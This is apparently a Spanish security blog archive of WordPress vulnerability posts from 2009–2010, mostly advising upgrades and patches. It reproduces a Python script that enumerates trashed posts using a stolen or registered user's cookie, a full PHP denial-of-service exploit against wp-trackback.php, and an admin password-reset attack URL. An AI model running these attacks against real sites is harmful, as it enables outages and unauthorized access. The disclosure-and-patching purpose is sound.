La Comunidad DragonJAR » WordPress

Pueden leer tu “Basura”

DragoN — Mon, 15 Feb 2010 07:33:25 +0000

Un nuevo fallo en el famoso WordPress, descubierto por el investigador Thomas Mackenzie permitiría a “cualquier” persona los artículos, comentarios y paginas, que hayas borrado y se encuentren en la “papelera”.

Desde la versión 2.9 de WordPress se implementó una nueva característica llamada “papelera“, con la cual todos los artículos, comentarios o páginas “borradas” pasarían a la “papelera de reciclaje” para prevenir así que sean eliminados de forma accidental.

Lo que descubrió Thomas Mackenzie es que en WordPress decidieron no ponerle restricción de acceso a los contenidos de la “papelera”, por lo que cualquier persona con privilegio 0 (Suscriptor) podría ver todo lo que estuviera almacenado en ella, el único inconveniente (y posiblemente la razón por la que dejaron este nivel de acceso), es que necesitamos conocer la ruta de los contenidos eliminados para poder acceder a ellos… cosa que Mackenzie pudo solucionar desarrollando este script en Python, con el que enumera los contenidos que tenemos en nuestra “papelera”.

#/usr/bin/python
#
# WordPress > 2.9 Failure to Restrict URL Access PoC
#
# This script iterates through the WP post ID’s as an authenticated and unauthenticated user.
# If the requests differ a ‘Trash’ post has been found.
#
# You will need an authenticated user cookie of any priveledge to run this script.
#
# Example cookie:
# wordpress_logged_in_62b3ab14f277d92d3d313662ea0c84e3=test%7C1266245173%7C990157a59700a69edbf133aa22fca1f8
#
# Will only work with WP URLs with the ‘/?p={int}’ parameter. Would need to handle redirects (3xx) to handle all URL types.
#
#
# Research/PoC/Advisory By: Tom Mackenzie (tmacuk) and Ryan Dewhurst (ethicalhack3r)

import httplib

# Declare vars
blogURL = “www.example.com”
userCookie = “enter_cookie_here”
postID = 0 #Leave at 0

conn = httplib.HTTPConnection(blogURL)
Headers = {“Cookie” : userCookie}

print
print “Target = http://” + blogURL + “/?p=” + str(postID)
print

while 1:

# Start non authenticated enumeration

request = ‘/?p=’ + str(postID)
conn.request(“GET”, request, “”)

try:
r1 = conn.getresponse()
except:
print “Connection error”

data1 = r1.read()

# Start authenticated enumeration

conn.request(“GET”, request, None, Headers)

try:
r2 = conn.getresponse()
except:
print “Connection error”

data2 = r2.read()

# Compare the HTML body reponses

if data1 != data2:
print “+ Found! http://” + blogURL + request
else:
print request

postID += 1

conn.close()

Como pueden ver, en esta prueba de concepto, es necesario contar con una cookie de un usuario logueado en el sistema, cosa que no es difícil si el blog tiene el registro de usuarios activo (practica poco recomendada) o se puede conseguir mediante ingeniería social, por lo tanto es mas que recomendable que actualicen su instalación de WordPress a la versión 2.9.2 que ya cuenta con un parche para este problema de seguridad.

Una vez más queda confirmado que la seguridad por “oscuridad” no es una buena práctica y siempre debe estar acompañada con otras medias que garanticen la confidencialidad, integridad y disponibilidad de nuestra información.

PD. Lo que no entiendo es por que páginas como DaboWeb y Mangas Verdes hablan de este fallo y afirman que un posible atacante puede “Eliminar artículos de nuestro WordPress” ¿De donde habrán sacado esa informacion?…

También puede interesarte...

Nueva versíon de WordPress 2.9

DragoN — Fri, 18 Dec 2009 05:03:28 +0000

La nueva versión de WordPress, el software para la creación de blogs mas utilizado en la red, ha salido a la luz con mas de 40 funcionalidades nuevas, entre las que se destacan las siguientes:

Editor de Imágenes Online: Ahora WordPress contara con un editor de imágenes, escrito en javascript y que nos permitirá cortar y rotar, funciones que hace mucho hacían falta
Papelera: En esta nueva versión WordPress incorpora un sistema de papelera para nuestros post y comentarios borrados, para activarla debemos agregar la siguiente linea define( ‘EMPTY_TRASH_DAYS’, 30 ); en nuestro wp-config.php donde 30 son los días a guardar los post y comentarios en la papelera.
Incrustación de multimedia: ya no hará falta el código embed, simplemente poniendo la URL mostrará el contenido, los sistemas soportados son: YouTube, Daily Motion, Blip.tv, Flickr, Hulu, Viddler, Qik, Revision3, Scribd, Google Video, Photobucket, PollDaddy, y WordPress.tv.
Gestión de Multimedia: El gestor de contenidos multimedia se ha vuelto a escribir desde 0, para mejorar sus funcionalidades.
Sistema de Actualización: Ahora es posible actualizar los plugins masivamente.
Reparación de base de datos: Una nueva utilidad integrada en el sistema nos permite realizar una reparación de nuestra base de datos en caso de que tenga errores, para esto solo necesitamos añadir en el archivo wp-config.php esta línea: define(’WP_ALLOW_REPAIR’, true);. Después de reparada la tabla, la eliminamos.
Seguridad: Se han mejorado múltiples aspectos en la seguridad de WordPress y reparados mas de 500 errores reportados, esperemos que esta versión sea estable en cuanto a seguridad y no tengan que sacar nuevas versiones solo para corregir problemas de seguridad.

La anterior lista son solo algunas de las nuevas funcionalidades de WordPress, si quieres ver todos los cambios de esta versión 2.9 ingresa a este enlace.

Descargar WordPress 2.9

Mas Información:
Codex Versión 2.9
WordPress 2.9, oh so fine

También puede interesarte...

XSS que permite postear a atacante registrado en WordPress

DragoN — Thu, 12 Nov 2009 07:56:06 +0000

Una nueva revisión de seguridad ha salido para la rama 2.8.x del popular WordPress, en esta ocasión se corrigen 2 fallos, el primero descubierto por el investigador en seguridad web Benjamin Flesch, permite a un usuario registrado, por medio de un ataque XSS en la función “Publica esto” (Press this), publicar cualquier contenido en nuestra pagina.

El segundo problema no es explicado claramente en el comunicado oficial de WordPress, solo nos comentan que el error se encuentra el sistema de archivos y que podría provocar vulnerabilidades en ciertas configuraciones de Apache y que lo ha Dawid Golunski.

Es recomendable que actualicen su versión de WordPress, ya sea por el panel de administración o descargando la ultima version desde su pagina oficia, para asegurarse de que tiene la mejor protección disponible.

También puede interesarte...

Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5

DragoN — Wed, 21 Oct 2009 07:08:09 +0000

Desde hace unos meses los desarrolladores de wordpress están trabajando en lo que seria la versión 2.9 del famoso administrador de contenidos, pero debido a los eventos recientes relacionados con la seguridad en wordpress se han tomado una pausa para realizar un endurecimiento (hardening) a la seguridad de la rama 2.8.x con el fin de corregir y prevenir problemas de seguridad futuros.

Por esta razón publican una nueva version de WordPress 2.8.5 en la que todos los cambios realizados son relacionados con la seguridad:

Arreglaron el error del archivo wp-trackback.php que permitía una Denegacion de Servicio en WordPress
Realizaron una re validación de variables para que errores como los del trackback no ocurran de nuevo.
Se realizó un cambiado en el archivo que permite subir a la lista blanca todos los usuarios, incluidos los Administradores.
Eliminados 2 importadores de etiquetas para plugins viejos.

Es recomendable que se se actualicen a esta nueva versión de WordPress para asegurarse de que tiene la mejor protección disponible.

En el anuncio realizado por Peter Westwood se recomienda la utilización del plugin WordPress Exploit Scanner, para buscar código sospechoso en la base de datos de los post y comentarios, mas informacion sobre este plugin en su pagina oficial.

También puede interesarte...

Denegacion de Servicio en WordPress

DragoN — Sun, 18 Oct 2009 21:26:41 +0000

Jose Carlos Norte acaba de publicar en su blog, un nuevo fallo de seguridad descubierto en el popular wordpress, este fallo permite a a cualquier persona de forma sencilla dejar fuera de linea un blog con WordPress causando una denegacion de servicio.

El bug se encuentra en el archivo wp-trackback.php quien no valida adecuadamente la variable $charset, permitiendo ingresar una peticion POST especialmente diseñada con una cantidad indeterminada de parámetros, causando un gran consumo de memoria y CPU hasta que estos se agoten y el servidor deja de responder.

Todas las versiones de WordPress hasta el momento son vulnerables a este fallo (y según Jose Carlos, el parche que publicaría WordPress tampoco lo soluciona), aunque dependiendo de la configuración individual de cada servidor, el problema es mayor o menor, por ejemplo un servido con mod_security, no seria vulnerable ya que bloquearía estas peticiones mal intencionadas, también se pueden mitigar los daños con una adecuada configuración del parámetro php_memory_limit del php.ini para evitar que tus desarrollos web utilicen mas memoria de la que en realidad necesitan, podrías también utilizar el WP-IDS un mod para Wordpress del PHPIDS (reseñado el la guía blanca de seguridad en wordpress Wordpress Security Whitepaper) el cual bloquearía no solo estas peticiones sino muchos mas problemas de seguridad.

Les dejo la solución propuesta por Jose Carlos en su blog para este problema:

Reemplazar en la linea 45 del archivo wp-trackback.php esto $charset = $_POST['charset'];

por esto
$charset = str_replace(”,”,””,$_POST['charset']);
if(is_array($charset)) { exit; }

Y el exploit para verificar que somos vulnerables:

//wordpress Resource exhaustion Exploit //http://rooibo.wordpress.com/ //security@wordpress.org contacted and get a response, //but no solution available. if(count($argv) < 2) { echo “You need to specify a url to attack\n”; exit; }

$url = $argv[1];

$data = parse_url($url);
if(count($data) < 2) { echo “The url should have http:// in front of it, and should be complete.\n”; exit; } if(count($data) == 2) { $path = ”; } else { $path = $data['path']; } $path = trim($path,’/’); $path .= ‘/wp-trackback.php’; if($path{0} != ‘/’) { $path = ‘/’.$path; } $b = “”; $b = str_pad($b,140000,’ABCEDFG’); $b = utf8_encode($b); $charset = “”; $charset = str_pad($charset,140000,”UTF-8,”); $str = ‘charset=’.urlencode($charset); $str .= ‘&url=www.example.com’; $str .= ‘&title=’.$b; $str .= ‘&blog_name=lol’; $str .= ‘&excerpt=lol’; $count = 0; while(1) { $fp = @fsockopen($data['host'],80); if(!$fp) { if($count > 0) {
echo “down!!!!\n”;
exit;
}
echo “unable to connect to: “.$data['host'].”\n”;
exit;
}

fputs($fp, “POST $path HTTP/1.1\r\n”);
fputs($fp, “Host: “.$data['host'].”\r\n”);
fputs($fp, “Content-type: application/x-www-form-urlencoded\r\n”);
fputs($fp, “Content-length: “.strlen($str).”\r\n”);
fputs($fp, “Connection: close\r\n\r\n”);
fputs($fp, $str.”\r\n\r\n”);

echo “hit!\n”;
$count++;
}

?>

Para mas informacion:
Agujero de seguridad muy grave en WordPress
Atención! BUG Wordpress
Wordpress Security Whitepaper

$charset = $_POST['charset'];

También puede interesarte...

Reseteo Remoto del Password de Admin en WordPress

DragoN — Wed, 12 Aug 2009 04:36:49 +0000

No se que pasa con WordPress últimamente, el investigador Francés “Laurent Gaffié” acaba de publicar un full-disclosure en el que explica una nueva vulnerabilidad en la ultima versión de WordPress 2.8.3.

Esta nueva vulnerabilidad permite a un visitante mal intencionado resetar el password de administrador de un administrador impidiendo el acceso del mismo a su propio panel de administración, el error se encuentra en el archivo wp-login.php que no valida adecuadamente.
Un visitante mal intencionado puede resetear el password de administrador con solo visitar un enlace como el siguiente:

http://PAGINAAQUI.COM/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag

La buena noticia es que igual de fácil a su explotación es su solución, basta con buscar en el archivo wp-login.php el código:

if ( empty( $key ) )

y remplazarlo por:

if ( empty( $key ) || is_array( $key ) )

Aunque como siempre es recomendable que actualices tu versión a la WordPress a la 2.8.4 aun no sale oficialmente en español, pero puedes utilizar este paquete de idiomas para traducirlo.

También puede interesarte...

Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3

DragoN — Fri, 31 Jul 2009 18:54:26 +0000

De nuevo Automattic, la empresa desarrolladora de WordPress ha publicado una revisión de la rama 2.8.x de su producto estrella, para corregir problemas de seguridad en la versión 2.8.2 de WordPress, de momento no se tiene mucha informacion del problema, pero es recomendable que actualices tu instalación..

Recuerda que la nueva versión de WordPress, la 2.8.3 aun no sale oficialmente en español, pero puedes utilizar este paquete de idiomas para traducirlo.

También puede interesarte...

XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2

DragoN — Mon, 20 Jul 2009 20:49:40 +0000

Parece que Automattic, la empresa desarrolladora de WordPress ha tenido mucho trabajo últimamente con la rama 2.8.x de su producto, primero corrigieron un error en la versión 2.8 de WordPress, sacando la 2.8.1 y en menos de 15 dias ha salido esta nueva versión 2.8.2 que soluciona una vulnerabilidad XSS en los comentarios, haciendo posible que desde el panel de administración, un comentario especialmente diseñado, redirija al administrador a una url donde por ejemplo puedan robar sus cookies y acceder como administrador a nuestro panel.

Es recomendable que actualices tu versión de WordPress a la 2.8.2 aun no sale oficialmente en español, pero puedes utilizar este paquete de idiomas para traducirlo.

También puede interesarte...

Actualiza a WordPress 2.7.1

DragoN — Tue, 10 Feb 2009 04:31:57 +0000

Hace unas horas se publico la nueva versión 2.7.1 de WordPress, con la cual se da solución a 68 tickets que estaban pendientes, es recomendable actualizar nuestra instalación de WordPress a esta nueva versión, ya sea descargándola y reemplazando los archivos o directamente desde ‘Herramientas>Actualizar’ del panel de administración.

También puede interesarte...

WordPress 2.6.3 vulnerable a Cross Site Scripting

DragoN — Thu, 08 Jan 2009 10:48:02 +0000

Gracias a blogsecurity y a ayudawordpress me entero de una vulnerabilidad descubierta por Jeremias Reith en WordPress 2.6.3 que podría permitir a un atacante sin identificar acceder a tu blog.

El fallo se encuentra en la funcion “self_link() “del archivo “wp-includes/feed.php” que al no validar correctamente los parametros de entrada permite realizar un ataque XSS con el que se pueden acceder a las cookies del usuario y obtener privilegios de administrador.

Este problema se solucionó en la versión WordPress 2.6.5, si no quieres dar todavia el paso a la version 2.7 de wordpress es recomendable que actualices tu version a la 2.6.5 para resolver este problema de seguridad.

Jeremias ha publicado un aviso en Bugtraq, en el que se explica en detalla tecnicamente el error e incluye un una prueba de concepto